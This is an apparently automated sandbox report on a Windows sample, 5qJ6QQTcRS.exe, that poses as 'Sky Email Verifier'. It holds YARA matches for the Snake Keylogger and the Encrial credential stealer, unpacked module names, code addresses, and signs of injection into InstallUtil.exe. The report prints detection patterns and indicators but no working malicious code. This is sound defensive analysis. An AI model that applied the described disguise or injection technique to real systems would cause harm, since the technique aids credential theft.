Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 5qJ6QQTcRS.exe PID: 8140, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: InstallUtil.exe PID: 8132, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe

Code function: 0_2_0791DCA0 CreateProcessAsUserW,

0_2_0791DCA0

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_00AF1EB0	0_2_00AF1EB0
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_00AF0C88	0_2_00AF0C88
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_00AF0FA0	0_2_00AF0FA0
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_00E282E8	0_2_00E282E8
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_00E2CC90	0_2_00E2CC90
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_00E27598	0_2_00E27598
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_00E27D00	0_2_00E27D00
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_04FECE9C	0_2_04FECE9C
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_06121C00	0_2_06121C00
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_06121BD1	0_2_06121BD1
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_06120006	0_2_06120006
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_06120040	0_2_06120040
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_061296C7	0_2_061296C7
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_06121BF3	0_2_06121BF3
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07574E58	0_2_07574E58
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_075706E0	0_2_075706E0
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_0757F848	0_2_0757F848
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07635C90	0_2_07635C90
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07630FC2	0_2_07630FC2
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07630FD0	0_2_07630FD0
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07694378	0_2_07694378
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_0769C378	0_2_0769C378
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07693210	0_2_07693210
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_0769E030	0_2_0769E030
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_0769D410	0_2_0769D410
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_0769E8A8	0_2_0769E8A8
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07693200	0_2_07693200
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_0769E016	0_2_0769E016
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07692CB5	0_2_07692CB5
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07918B38	0_2_07918B38
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_0791E368	0_2_0791E368
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07910E01	0_2_07910E01
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_0791BA30	0_2_0791BA30
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_0791BDB0	0_2_0791BDB0
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_079135A8	0_2_079135A8
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07916CE0	0_2_07916CE0
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07910040	0_2_07910040
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07912B98	0_2_07912B98
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_079133F0	0_2_079133F0
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07912F50	0_2_07912F50
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07912F40	0_2_07912F40
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07911688	0_2_07911688
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07913598	0_2_07913598
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07913188	0_2_07913188
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07911DB8	0_2_07911DB8
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07911DC8	0_2_07911DC8
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07914158	0_2_07914158
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07913179	0_2_07913179
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_0791C560	0_2_0791C560
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_0791289A	0_2_0791289A
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_079128A8	0_2_079128A8
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07916CD1	0_2_07916CD1
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_079140DD	0_2_079140DD
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07917CF8	0_2_07917CF8
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07917CE8	0_2_07917CE8
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07913400	0_2_07913400
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_0791A838	0_2_0791A838
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07910025	0_2_07910025
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07F54B88	0_2_07F54B88
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07F54B78	0_2_07F54B78
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07F5EAB0	0_2_07F5EAB0
Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe	Code function: 0_2_07636857	0_2_07636857
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_00F8A088	4_2_00F8A088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_00F8C146	4_2_00F8C146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_00F8D278	4_2_00F8D278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_00F85362	4_2_00F85362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_00F8C468	4_2_00F8C468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_00F8C738	4_2_00F8C738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_00F829E0	4_2_00F829E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_00F869A0	4_2_00F869A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_00F8E988	4_2_00F8E988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_00F8CA08	4_2_00F8CA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_00F8CCD8	4_2_00F8CCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_00F86FC8	4_2_00F86FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_00F8CFA9	4_2_00F8CFA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_00F8F631	4_2_00F8F631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_00F8E97B	4_2_00F8E97B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_00F8FA88	4_2_00F8FA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_00F83E09	4_2_00F83E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05627D78	4_2_05627D78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05628B58	4_2_05628B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05627720	4_2_05627720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562E578	4_2_0562E578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05620D48	4_2_05620D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05620D38	4_2_05620D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562C108	4_2_0562C108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_056215E9	4_2_056215E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_056215F8	4_2_056215F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_056265C0	4_2_056265C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_056241C8	4_2_056241C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_056211A0	4_2_056211A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_056241B8	4_2_056241B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562E588	4_2_0562E588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562C588	4_2_0562C588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05621190	4_2_05621190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562C598	4_2_0562C598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05623460	4_2_05623460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562BC67	4_2_0562BC67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562DC68	4_2_0562DC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562BC78	4_2_0562BC78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05620040	4_2_05620040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562FC48	4_2_0562FC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562DC57	4_2_0562DC57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562FC58	4_2_0562FC58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05626020	4_2_05626020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05626030	4_2_05626030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05620006	4_2_05620006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05623008	4_2_05623008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562A0E0	4_2_0562A0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_056208E1	4_2_056208E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562E0E8	4_2_0562E0E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_056208F0	4_2_056208F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562E0F8	4_2_0562E0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562C0F8	4_2_0562C0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562A0D0	4_2_0562A0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05620488	4_2_05620488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05620498	4_2_05620498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562D348	4_2_0562D348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05622748	4_2_05622748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562B348	4_2_0562B348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05628B49	4_2_05628B49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05622758	4_2_05622758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562B358	4_2_0562B358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05625328	4_2_05625328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562F328	4_2_0562F328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562D337	4_2_0562D337
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562F338	4_2_0562F338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05622300	4_2_05622300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05627711	4_2_05627711
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05625318	4_2_05625318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562B7E8	4_2_0562B7E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05622FF8	4_2_05622FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05625BCA	4_2_05625BCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562F7C8	4_2_0562F7C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562D7C9	4_2_0562D7C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562B7DA	4_2_0562B7DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05625BD8	4_2_05625BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562D7D8	4_2_0562D7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05622BA1	4_2_05622BA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05622BB0	4_2_05622BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562F7B9	4_2_0562F7B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05625780	4_2_05625780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05626E60	4_2_05626E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05624A68	4_2_05624A68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05626E70	4_2_05626E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05624A78	4_2_05624A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05621A40	4_2_05621A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05621A50	4_2_05621A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05624620	4_2_05624620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562CA28	4_2_0562CA28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562EA07	4_2_0562EA07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05626A0A	4_2_05626A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05624610	4_2_05624610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562CA17	4_2_0562CA17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05626A18	4_2_05626A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562EA18	4_2_0562EA18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_056222F1	4_2_056222F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05624EC2	4_2_05624EC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_056272C8	4_2_056272C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562AEC8	4_2_0562AEC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05624ED0	4_2_05624ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562CEA7	4_2_0562CEA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05621EA8	4_2_05621EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562EEA8	4_2_0562EEA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562AEB7	4_2_0562AEB7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562CEB8	4_2_0562CEB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_056272B8	4_2_056272B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_0562EE97	4_2_0562EE97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4_2_05621E98	4_2_05621E98

Source: 5qJ6QQTcRS.exe, 00000000.00000002.1964651903.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 5qJ6QQTcRS.exe
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1973635431.00000000078C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameRP8SH.dll6 vs 5qJ6QQTcRS.exe
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs 5qJ6QQTcRS.exe
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBamokinepApp.dll< vs 5qJ6QQTcRS.exe
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1971799166.0000000005B60000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameBamokinepApp.dll< vs 5qJ6QQTcRS.exe
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs 5qJ6QQTcRS.exe
Source: 5qJ6QQTcRS.exe, 00000000.00000000.1287883325.0000000000DBC000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSky Email Verifier.exeF vs 5qJ6QQTcRS.exe
Source: 5qJ6QQTcRS.exe	Binary or memory string: OriginalFilenameSky Email Verifier.exeF vs 5qJ6QQTcRS.exe

Source: 5qJ6QQTcRS.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 5qJ6QQTcRS.exe PID: 8140, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: InstallUtil.exe PID: 8132, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/3

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\5qJ6QQTcRS.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Mutant created: NULL

Source: 5qJ6QQTcRS.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 5qJ6QQTcRS.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\5qJ6QQTcRS.exe

